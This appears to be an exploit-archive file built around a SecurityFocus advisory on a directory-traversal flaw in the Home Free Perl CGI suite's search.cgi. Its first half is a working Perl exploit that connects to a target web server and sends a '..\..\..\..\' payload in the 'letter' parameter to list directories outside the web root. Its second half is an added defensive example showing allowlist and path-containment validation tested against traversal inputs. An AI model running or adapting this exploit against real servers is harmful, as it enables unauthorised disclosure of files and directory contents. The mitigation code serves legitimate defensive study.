36 lines
No EOL
1.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/921/info

Home Free is a suite of Perl CGI scripts that allow a website to support user contributions of various types. One of the scripts, search.cgi, accepts a parameter called letter, which can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used to obtain directory listings and the first line of files outside of the intended web filesystem.

#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to list
# directories on the host.
#
#

use IO::Socket;

if ($ARGV[0] eq "") { die "no argument\n"; }

$asoc = IO::Socket::INET->new(Proto    => "tcp",
                              PeerAddr => "target.host.net",
                              PeerPort => 80) ||
    die "can't connect to host: $!";

# Make the socket the default output handle and turn off buffering on it.
select($asoc);
$| = 1;

print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";

# Print the fourth '/'-separated component of the first quoted string
# on each response line that matches the HREF/TD pattern.
while(<$asoc>) {
    if ($_ =~ /.+HREF.+TD.+/) {
        @parts = split("\"", $_);
        $foo = $parts[1];
        @parts = split("/", $foo);
        print STDOUT $parts[3];
        print STDOUT "\n";
    }
}

close($asoc);
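
The input check that the description above shows search.cgi lacks, as an added example that is not Home Free's code and not part of the original file. The name `safe_letter_dir`, the temporary base directory, the Unix-style paths and the assumption that legitimate `letter` values are short names made of letters, digits, `_` and `-` are all hypothetical.

```perl
#!/usr/bin/perl
# Added example: confine a "letter"-style parameter to one base directory.
# safe_letter_dir() and the demo directory are hypothetical, not Home Free code.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical directory for $letter under $base, or undef when the
# value is not a plain name or resolves outside $base.
sub safe_letter_dir {
    my ($base, $letter) = @_;
    return undef unless defined $letter;

    # Allowlist (assumed policy): 1-32 characters from [A-Za-z0-9_-], so
    # '.', '/', '\', '%' and NUL bytes never reach the filesystem call.
    return undef unless $letter =~ /\A[A-Za-z0-9_-]{1,32}\z/;

    my $root = realpath($base);
    return undef unless defined $root;

    # Resolve symlinks, then require an existing directory.
    my $path = realpath(File::Spec->catdir($root, $letter));
    return undef unless defined $path && -d $path;

    # Containment check on the resolved path, in case a symlink inside
    # the base directory points somewhere else.
    return undef unless index($path, "$root/") == 0;
    return $path;
}

# Constructed demo data: a base directory holding one legitimate entry "a".
my $base = tempdir(CLEANUP => 1);
mkdir "$base/a" or die "mkdir: $!";

# Constructed inputs: one valid value, then traversal-style values.
for my $letter ('a', '../etc', '..\\..\\..\\..\\etc', 'a/../..', 'a%2f..', "a\0", '') {
    my $dir = safe_letter_dir($base, $letter);
    (my $shown = $letter) =~ s/\0/\\0/g;    # make the NUL byte printable
    printf "%-22s %s\n", "'$shown'", defined $dir ? "accepted" : "rejected";
}
```

Only `a` is accepted; every other constructed value is rejected by the allowlist before any filesystem call is made.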